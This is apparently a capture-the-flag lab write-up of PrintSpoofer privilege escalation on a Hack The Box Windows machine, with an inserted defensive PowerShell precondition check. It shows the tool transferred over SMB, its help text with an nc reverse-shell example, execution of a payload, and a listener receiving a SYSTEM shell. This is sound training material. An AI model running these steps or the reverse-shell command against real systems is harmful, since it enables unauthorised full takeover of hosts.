PrintSpoofer
There is another alternative to JuicyPotato for Windows 10 1809 and above and Windows Server 2016/2019: it's called PrintSpoofer.
In order for this tool to work, the exploit has to be run as either the LOCAL SERVICE or the NETWORK SERVICE account, and that account must have SeImpersonatePrivilege.
The current user is a local service account and has SeImpersonatePrivilege enabled.
exploit (printspoofer)
The exploit can be downloaded online.
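Before reaching for the tool, it is worth confirming the two preconditions the text names (a service-account token holding SeImpersonatePrivilege, and a running Print Spooler that the tool leverages), since those are also exactly what a defender audits and removes. The following PowerShell is an added example written for this page, not code from the PrintSpoofer project or the original write-up; it assumes Windows PowerShell 5.1 or later with an English-language `whoami /priv` output, and the function name `Test-PrintSpooferPreconditions` is my own.

```powershell
# Added example (not part of the original write-up or the PrintSpoofer project).
# Reports whether the current context matches the preconditions described in the
# text, so the output can be used either to confirm a finding or to decide what
# to harden (the Print Spooler is the obvious service to disable where unneeded).
# Assumption: English locale, so `whoami /priv` prints "Enabled"/"Disabled".

function Test-PrintSpooferPreconditions {
    $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()

    # Parse the token's privilege list from `whoami /priv`; one line per privilege,
    # e.g. "SeImpersonatePrivilege  Impersonate a client after authentication  Enabled".
    $privLines   = whoami /priv 2>$null
    $impersonate = $privLines | Where-Object { $_ -match '^SeImpersonatePrivilege\s' }
    $hasImpersonate     = [bool]$impersonate
    $impersonateEnabled = $hasImpersonate -and [bool]($impersonate -match '\sEnabled\s*$')

    # The technique depends on the Print Spooler service; record its state.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue

    [pscustomobject]@{
        User                 = $identity.Name
        IsServiceAccount     = $identity.Name -in @('NT AUTHORITY\LOCAL SERVICE',
                                                    'NT AUTHORITY\NETWORK SERVICE')
        HasSeImpersonate     = $hasImpersonate
        SeImpersonateEnabled = $impersonateEnabled
        SpoolerRunning       = ($null -ne $spooler) -and ($spooler.Status -eq 'Running')
        SpoolerStartType     = if ($spooler) { $spooler.StartType } else { 'NotInstalled' }
    }
}

$result = Test-PrintSpooferPreconditions
$result | Format-List

if ($result.HasSeImpersonate -and $result.SpoolerRunning) {
    Write-Warning ("Token holds SeImpersonatePrivilege and the Print Spooler is running: " +
                   "this host matches the PrintSpoofer preconditions. Disable the Spooler " +
                   "service on hosts that do not need to print.")
}
```

Note that the privilege may be listed as present but disabled; the check reports both states separately because the privilege being present in the token is what matters for impersonation, and the tool's own output (`[+] found privilege: SeImpersonatePrivilege`) reflects that same lookup. On a non-English system the `Enabled` match needs the localized string.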
Exploitation
ps c:\tmp> copy \\10.10.14.5\smb\potato\PrintSpoofer64.exe .
I transferred the exploit to the target system over SMB
ps c:\tmp> .\PrintSpoofer64.exe -h
PrintSpoofer v0.1 (by @itm4n)
Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()
arguments:
-c <CMD> Execute the command *CMD*
-i Interact with the new process in the current command prompt (default is non-interactive)
-d <ID> Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
-h that's me :)
examples:
- Run PowerShell as SYSTEM in the current console
PrintSpoofer.exe -i -c powershell.exe
- Spawn a SYSTEM command prompt on the desktop of the session 1
PrintSpoofer.exe -d 1 -c cmd.exe
- Get a SYSTEM reverse shell
printspoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"
PrintSpoofer can spawn a new process attached to the current console, or on the desktop of a specified session. Since the current PowerShell session isn't interactive, I will just execute the payload.
ps c:\tmp> .\PrintSpoofer64.exe -c "C:\tmp\pe.exe"
[+] found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Executing PrintSpoofer with the -c flag to launch C:\tmp\pe.exe. Upon successful exploitation:
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.180] 49786
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) Microsoft Corporation. All rights reserved.
ps c:\Windows\system32> whoami
nt authority\system
ps c:\Windows\system32> hostname
remote
ps c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::ba
ipv6 address. . . . . . . . . . . : dead:beef::25dd:3404:8d18:2459
link-local ipv6 address . . . . . : fe80::25dd:3404:8d18:2459%12
ipv4 address. . . . . . . . . . . : 10.10.10.180
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%12
10.10.10.2
System Level Compromise